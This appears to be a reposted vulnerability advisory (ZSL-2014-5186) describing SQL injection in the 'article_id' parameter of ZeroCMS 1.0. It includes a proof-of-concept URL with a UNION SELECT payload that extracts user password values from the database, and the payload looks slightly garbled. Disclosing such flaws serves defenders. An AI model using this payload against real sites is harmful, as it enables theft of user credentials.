ZeroCMS 1.0 (article_id) SQL Injection Vulnerability

Vendor: Another Awesome Stuff
Product web page:
Affected version: 1.0

Summary: ZeroCMS is a very simple Content Management
System built using PHP and MySQL.

Desc: Input passed via the 'article_id' GET parameter
to zero_view_article.php script is not properly sanitised
before being used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code.

Tested on: Apache/2.4.7 (Win32)
           MySQL 5.6.14

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2014-5186
Advisory URL:



http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+(select+concat(unhex(hex(cast(,0x20,0x7c,0x20,unhex(hex(cast(zero_users.password+as+char))))+from+`zcdb`.zero_users+limit 0,1),2,3,4,5,6--
Tagged on:     

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *